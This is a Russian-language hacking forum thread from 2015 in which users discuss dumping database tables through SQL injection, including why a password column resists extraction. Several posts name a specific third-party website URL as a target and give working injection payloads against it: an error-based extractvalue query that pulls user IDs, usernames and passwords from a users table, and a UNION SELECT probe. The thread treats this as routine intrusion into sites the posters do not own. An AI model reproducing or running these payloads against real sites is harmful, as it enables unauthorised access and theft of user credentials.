HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.08.2015, 02:03
nopony
Новичок
Регистрация: 29.08.2013
Сообщений: 7
Провел на форуме:
1814

Репутация: 8
По умолчанию

Здравствуйте,такая проблема,из таблицы выводятся данные,но не все,которые мне нужны т.е. допустим email я вывести могу,а password нет,подскажите,с чем это связано? Не в первый раз уже такое замечаю. Причём без разницы как я пытаюсь вывести,прямым запросом или через sqlmap,результат один. Вывожу из бд,в которой я нахожусь в данный момент+если email выводится,то по идее доступ к таблице есть,или же можно как то ограничить доступ к полю?
 
Ответить с цитированием

  #2  
Старый 24.08.2015, 03:57
private_static
Участник форума
Регистрация: 19.05.2015
Сообщений: 117
Провел на форуме:
25535

Репутация: 22
По умолчанию

Цитата:
Сообщение от None  
или же можно как то ограничить доступ к полю?
можно, через GRANT

думаю что при грамотном разграничении доступа к полям можно усложнить жизнь атакующим, тоесть например если ты даже найдёш sql инъекцию в скрипте news.php то не сможеш прочитать поле password т.к. в скрипте news.php незачем обращаться к полю password и доступ к нему ограничен, обращаться к данному полю например можно только из скрипта login.php и следовательно чтобы прочитать поле password нужно искать sqlinj в скрипте login.php. Но на практике лично я такого разграничения почти нигде не встречал

А вообще можете подключить tamper скрипты в sqlmap и попробовать прочитать поле с их помощью, мож там waf какой-нибудь стоит
 
Ответить с цитированием

  #3  
Старый 24.08.2015, 04:20
nopony
Новичок
Регистрация: 29.08.2013
Сообщений: 7
Провел на форуме:
1814

Репутация: 8
По умолчанию

Цитата:
Сообщение от private_static  

можно, через GRANT
думаю что при грамотном разграничении доступа к полям можно усложнить жизнь атакующим, тоесть например если ты даже найдёш sql инъекцию в скрипте news.php то не сможеш прочитать поле password т.к. в скрипте news.php незачем обращаться к полю password и доступ к нему ограничен, обращаться к данному полю например можно только из скрипта login.php и следовательно чтобы прочитать поле password нужно искать sqlinj в скрипте login.php. Но на практике лично я такого разграничения почти нигде не встречал
А вообще можете подключить tamper скрипты в sqlmap и попробовать прочитать поле с их помощью, мож там waf какой-нибудь стоит
WAFа нету,count(password) выполняется,так что похоже всё таки ограничение на скрипт,спасибо
 
Ответить с цитированием

  #4  
Старый 24.08.2015, 11:23
Axiomatic
Познающий
Регистрация: 27.03.2014
Сообщений: 40
Провел на форуме:
15479

Репутация: 0
По умолчанию

вот например не дампится sqlmap'ом http://www.sedimental.com/catalog/index.php?ID=67 .

в чем причина ? есть решения ?
 
Ответить с цитированием

  #5  
Старый 24.08.2015, 16:07
nopony
Новичок
Регистрация: 29.08.2013
Сообщений: 7
Провел на форуме:
1814

Репутация: 8
По умолчанию

Цитата:
Сообщение от Axiomatic  

вот например не дампится sqlmap'ом
http://www.sedimental.com/catalog/index.php?ID=67
.
в чем причина ? есть решения ?
Не знаю как насчёт sqlmap(а),но этот сайт руками дампится "67' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x3b,ID,user,password) from users limit 0,1))) or 1='1" (без "),а вот мой сайт не дампится ни руками ни sqlmapом
 
Ответить с цитированием

  #6  
Старый 24.08.2015, 23:56
Axiomatic
Познающий
Регистрация: 27.03.2014
Сообщений: 40
Провел на форуме:
15479

Репутация: 0
По умолчанию

оО , спасибо ! запрос "67' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x3b,ID,user,password) from users limit 0,1))) or 1='1"

стандартен на подобного вида ошибку или индивидуально подбирается для каждого сайта ?
 
Ответить с цитированием

  #7  
Старый 25.08.2015, 00:31
nopony
Новичок
Регистрация: 29.08.2013
Сообщений: 7
Провел на форуме:
1814

Репутация: 8
По умолчанию

Цитата:
Сообщение от Axiomatic  

оО , спасибо ! запрос "67
' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x3b,ID,user,password) from users limit 0,1)))
or 1='1"
стандартен на подобного вида ошибку или индивидуально подбирается для каждого сайта ?
Выделенная часть-стандартна,а остальное для уравновешивания ковычек
 
Ответить с цитированием

  #8  
Старый 25.08.2015, 12:23
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
По умолчанию

Цитата:
Сообщение от Axiomatic  

вот например не дампится sqlmap'ом
http://www.sedimental.com/catalog/index.php?ID=67
.
в чем причина ? есть решения ?
Понятия не имею как работает sqlmap бо никогда им не пользовался, но, скорее всего, проблема заключается в том, что там используется 2 sql запроса и если хотя бы один из них возвращает ошибку, то софтина считает, что запрос не удался.

И да, error based в данном случае излишен.

Код:
http://www.sedimental.com/catalog/index.php?ID=-67' union select 1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15,16,17 -- 1
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.